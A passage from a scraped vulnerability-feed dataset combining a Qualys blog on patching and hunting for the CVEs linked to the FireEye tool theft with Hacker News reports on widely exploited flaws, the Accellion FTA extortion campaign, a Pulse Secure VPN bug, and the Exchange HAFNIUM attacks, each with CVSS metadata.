Adversaries send documents with malicious links to end users\n 2. Execution [TA002]. Perform remote code execution from the malicious link\n 3. Exploitation for Privilege Escalation [T1068]: Adversary performs a local privilege escalation attack through the remotely executed code to gain escalated privilege\n\n### Remediate with Qualys Patch Management\n\nThis table shows the applicable patch details for each CVE.\n\n**CVE** | **Patch KB** \n---|--- \nCVE-2020-1472 | KB4571736, KB4571702 \nCVE-2019-0604 | KB4462199, KB4462202, KB4462143, KB4462184, KB4461630, KB4462211 \nCVE-2019-0708 | KB4499164, KB4499175, KB4499149, KB4499180 \nCVE-2017-11774 | KB4011178, KB4011196, KB4011162 \nCVE-2016-0167 | KB3145739 \n \nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>): \n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273]) \n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches. Refer to the image below.\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches. You can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article.\n\n\n\n### Hunting for Indicators of Compromise with Endpoint Detection and Response (EDR)\n\n[Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) helps security teams hunt for evidence of these CVEs by looking for evidence of the files from the [provided IoCs](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>). End users can search for the above-mentioned IoCs and observables using the Qualys Query Language (QQL). For example, the MD5 hashes for CVE-2019-0604 can be searched using the following QQL:\n \n \n file.hash.md5:[\"708544104809ef2776ddc56e04d27ab1\",\"b814532d73c7e5ffd1a2533adc6cfcf8\",\"0eebeef32a8f676a1717f134f114c8bd\",\"5001ef50c7e869253a7c152a638eab8a\"]\n\n\n\nFurther, Qualys EDR users can search their susceptibility to any of the applicable attack vectors by searching for the respective technique and tactic ids.\n\n\n\n### Resources\n\nSee the comprehensive list of [all IoCs for each CVE](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>) referenced in this article. Right-click to download.\n\n### Assess and Act\n\nThe threat exposure details (like threat actor and adversarial TTP chain) for the CVEs presented above proves their high prevalence among cyber attackers, and especially, among state-sponsored threat actors who have been applying complex attack vectors to gain access to target networks by exploiting the above-mentioned CVEs.\n\nWhile the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) already prioritizes these CVEs (and associated QIDs) for remediation, we envision the comprehensive threat exposure details presented above will allow both cyber-attack detection and response teams to include an actionable plan to evaluate their exposure to impending attack vectors.\n\n### Learn More\n\nFor a detailed walkthrough of this research and how Qualys VMDR and EDR can help security teams address the threat, please sign up for the webinar:\n\n[**Unpacking the CVEs in the FireEye Breach**](<https://www.brighttalk.com/webcast/11673/467134>) \n**Thursday, February 4 at 10am Pacific**", "cvss3": {}, "published": "2021-02-01T20:40:25", "type": "qualysblog", "title": "Unpacking the CVEs in the FireEye Breach \u2013 Start Here First", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-0167", "CVE-2017-11774", "CVE-2019-0604", "CVE-2019-0708", "CVE-2020-1472"], "modified": "2021-02-01T20:40:25", "id": "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:06", "description": "[](<https://thehackernews.com/images/-o4PjWjTeBCk/YDSsM4Y2pnI/AAAAAAAAB3A/s_vIwO-nBdgTSgGdEET9fFhVzK0QVUeuwCLcBGAsYHQ/s0/data-breach.jpg>)\n\nCybersecurity researchers on Monday tied a [string of attacks](<https://thehackernews.com/2021/02/data-breach-exposes-16-million-jobless.html>) targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called **UNC2546**.\n\nThe attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang.\n\nBut in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms.\n\nAccording to [Risky Business](<https://risky.biz/newsletter44/>), some of the companies that have had their data listed on the site include Singapore's telecom provider [SingTel](<https://www.singtel.com/personal/support/about-accellion-security-incident>), the American Bureau of Shipping, law firm [Jones Day](<https://www.wsj.com/articles/hacker-claims-to-have-stolen-files-belonging-to-prominent-law-firm-jones-day-11613514532>), the Netherlands-based [Fugro](<https://www.fugro.com/media-centre/news/fulldetails/2021/02/12/cyber-security-incident-third-party-supplier-of-fugro>), and life sciences company Danaher.\n\n[](<https://thehackernews.com/images/-Q8lPq3Q_3Ak/YDSqVE_QgnI/AAAAAAAAB24/rXciWGBxiEoUYoFwkxwNK4iI-SawG1jkACLcBGAsYHQ/s0/data-theft.jpg>)\n\nFollowing the slew of attacks, Accellion has patched four FTA vulnerabilities that were known to be exploited by the threat actors, in addition to incorporating new monitoring and alerting capabilities to flag any suspicious behavior. The flaws are as follows -\n\n * CVE-2021-27101 - SQL injection via a crafted Host header\n * CVE-2021-27102 - OS command execution via a local web service call\n * CVE-2021-27103 - SSRF via a crafted POST request\n * CVE-2021-27104 - OS command execution via a crafted POST request\n\nFireEye's Mandiant threat intelligence team, which is leading the incident response efforts, is [tracking](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html>) the follow-on extortion scheme under a separate threat cluster it calls UNC2582 despite \"compelling\" overlaps identified between the two sets of malicious activities and previous attacks carried out by a financially motivated hacking group dubbed FIN11.\n\n\"Many of the organizations compromised by UNC2546 were previously targeted by FIN11,\" FireEye said. \"Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020.\"\n\nOnce installed, the DEWMODE web shell was leveraged to download files from compromised FTA instances, leading to the victims receiving extortion emails claiming to be from the \"CLOP ransomware team\" several weeks later.\n\nLack of reply in a timely manner would result in additional emails sent to a wider group of recipients in the victim organization as well as its partners containing links to the stolen data, the researchers detailed.\n\nBesides urging its FTA customers to migrate to kiteworks, Accellion [said](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-fta-security-incident-following-mandiants-preliminary-findings/>) fewer than 100 out of 300 total FTA clients were victims of the attack and that less than 25 appear to have suffered \"significant\" data theft.\n\nThe development comes after grocery chain Kroger [disclosed](<https://www.kroger.com/i/accellion-incident>) last week that HR data, pharmacy records, and money services records belonging to some customers might have been compromised as a result of the Accellion incident.\n\nThen earlier today, Transport for New South Wales (TfNSW) became the latest entity to confirm that it had been impacted by the worldwide Accellion data breach.\n\n\"The Accellion system was widely used to share and store files by organisations around the world, including Transport for NSW,\" the Australian agency [said](<https://www.transport.nsw.gov.au/news-and-events/articles/transport-for-nsw-impacted-by-worldwide-accellion-data-breach>). \"Before the attack on Accellion servers was interrupted, some Transport for NSW information was taken.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-23T07:18:00", "type": "thn", "title": "Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-23T08:26:03", "id": "THN:43A16BBDCD3B020E360EE37C48B44088", "href": "https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-BCVwauxz7O8/YKyosjaDKmI/AAAAAAAACn4/TLH1Bsw4NgwXyHFB5EmU57Aro4WWNwQegCLcBGAsYHQ/s0/pulse-secure-vpn-vulnerability.jpg>)\n\nIvanti, the company behind Pulse Secure VPN appliances, has published a security advisory for a high severity vulnerability that may allow an authenticated remote attacker to execute arbitrary code with elevated privileges.\n\n\"Buffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user,\" the company [said](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800>) in an alert published on May 14. \"As of version 9.1R3, this permission is not enabled by default.\"\n\nThe flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway's ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack.\n\n\"When specifying a long server name for some SMB operations, the 'smbclt' application may crash due to either a stack buffer overflow or a heap buffer overflow, depending on how long of a server name is specified,\" CERT/CC [detailed](<https://kb.cert.org/vuls/id/667933>) in a vulnerability note published on Monday, adding it was able to trigger the vulnerable code by targeting the CGI script '/dana/fb/smb/wnf.cgi.'\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.5 when it becomes available. In the interim, Ivanti has published a workaround file ('Workaround-2105.xml') that can be imported to disable the Windows File Share Browser feature by adding the vulnerable URL endpoints to a blocklist and thus activate necessary mitigations to protect against this vulnerability.\n\nIt bears noting that users running PCS versions 9.1R11.3 or below would need to import a different file named '[Workaround-2104.xml,](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/?kA23Z000000boUWSAY>)' necessitating that the PCS system is running 9.1R11.4 before applying the safeguards in 'Workaround-2105.xml.'\n\n[](<https://thehackernews.com/images/-2uTEZxdSTZw/YKypBTo6Q-I/AAAAAAAACoE/B0oJ9iYqOKkxyiyr2rn0S1KzYo5qu3QvgCLcBGAsYHQ/s0/pulse.jpg>)\n\nWhile Ivanti has recommended turning off Windows File Browser on the Admin UI by disabling the option 'Files, Window [sic]' for specific user roles, CERT/CC found the steps were inadequate to protect against the flaw during its testing. \n\n\"The vulnerable CGI endpoints are still reachable in ways that will trigger the 'smbclt' application to crash, regardless of whether the 'Files, Windows' user role is enabled or not,\" it noted.\n\n\"An attacker would need a valid DSID and 'xsauth' value from an authenticated user to successfully reach the vulnerable code on a PCS server that has an open Windows File Access policy.\"\n\nThe disclosure of a new flaw arrives weeks after the Utah-based IT software company [patched](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>) multiple critical security vulnerabilities in Pulse Connect Secure products, including CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900, the first of which was found to be actively [exploited in the wild](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) by at least two different threat actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-25T07:37:00", "type": "thn", "title": "New High-Severity Vulnerability Reported in Pulse Connect Secure VPN", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22908"], "modified": "2021-05-25T07:37:19", "id": "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA", "href": "https://thehackernews.com/2021/05/new-high-severity-vulnerability.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:03", "description": "[](<https://thehackernews.com/images/-9-w9YkXtT5w/YECrmqxcKZI/AAAAAAAAB8c/y1lgP3oxO-sd2Br7Oak7lJXAAcf7EG2XwCLcBGAsYHQ/s0/data-breach.jpg>)\n\nEnterprise cloud security firm **Qualys** has become the latest victim to join a long list of entities to have suffered a data breach after zero-day vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents.\n\nAs proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared screenshots of files belonging to the company's customers on a publicly accessible data leak website operated by the CLOP ransomware gang.\n\nConfirming the incident, Qualys Chief Information Security Officer Ben Carr [said](<https://blog.qualys.com/vulnerabilities-research/2021/03/03/qualys-update-on-accellion-fta-security-incident>) a detailed probe \"identified unauthorized access to files hosted on the Accellion FTA server\" located in a DMZ (aka [demilitarized zone](<https://en.wikipedia.org/wiki/DMZ_%28computing%29>)) environment that's segregated from the rest of the internal network.\n\n\"Based on this investigation, we immediately notified the limited number of customers impacted by this unauthorized access,\" Carr added. \"The investigation confirmed that the unauthorized access was limited to the FTA server and did not impact any services provided or access to customer data hosted by the Qualys Cloud Platform.\"\n\nLast month, FireEye's Mandiant threat intelligence team [disclosed](<https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html>) details of four zero-day flaws in the FTA application that were exploited by threat actors to mount a wide-ranging data theft and extortion campaign, which involved deploying a web shell called DEWMODE on target networks to exfiltrate sensitive data, followed by sending extortion emails to threaten victims into paying bitcoin ransoms, failing which the stolen data was posted on the data leak site.\n\n[](<https://thehackernews.com/images/-N0_0EMgMeSk/YECsZm15i_I/AAAAAAAAB8o/LpcUVTcjzyw22UE7TTrWXNzJGVpnzURugCLcBGAsYHQ/s0/data.jpg>)\n\nWhile two of the flaws (CVE-2021-27101 and CVE-2021-27104) were [addressed](<https://thehackernews.com/2021/02/data-breach-exposes-16-million-jobless.html>) by Accellion on December 20, 2020, the other two vulnerabilities (CVE-2021-27102 and CVE-2021-27103) were identified earlier this year and fixed on January 25.\n\nQualys said it received an \"integrity alert\" suggesting a possible compromise on December 24, two days after it applied the initial hotfix on December 22. The company didn't say if it received extortion messages in the wake of the breach, but said an investigation into the incident is ongoing.\n\n\"The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution,\" Mandiant [said](<https://www.accellion.com/company/security-updates/mandiant-issues-final-report-regarding-accellion-fta-attack/>) in a security assessment of the FTA software published earlier this week.\n\nAdditionally, Mandiant's source code analysis uncovered two more previously unknown security flaws in the FTA software, both of which have been rectified in a patch (version 9.12.444) released on March 1 \u2014\n\n * **CVE-2021-27730**: An argument injection vulnerability (CVSS score 6.6) accessible only to authenticated users with administrative privileges, and\n * **CVE-2021-27731**: A stored cross-site scripting flaw (CVSS score 8.1) accessible only to regular authenticated users\n\nThe FireEye-owned subsidiary is tracking the exploitation activity and the follow-on extortion scheme under two separate threat clusters it calls UNC2546 and UNC2582, respectively, with overlaps identified between the two groups and previous attacks carried out by a financially motivated threat actor dubbed FIN11. But it is still unclear what connection, if any, the two clusters may have with the operators of Clop ransomware.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-04T09:49:00", "type": "thn", "title": "Extortion Gang Breaches Cybersecurity Firm Qualys Using Accellion Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27730", "CVE-2021-27731"], "modified": "2021-03-08T07:30:27", "id": "THN:582576397E2C98200C7C952401392B5B", "href": "https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-AxSsNt-9gYo/YD838gSOOTI/AAAAAAAAB7Q/IuSgG26w0NU-eyKMabZMnUfb7QBDyHkUgCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nMicrosoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" 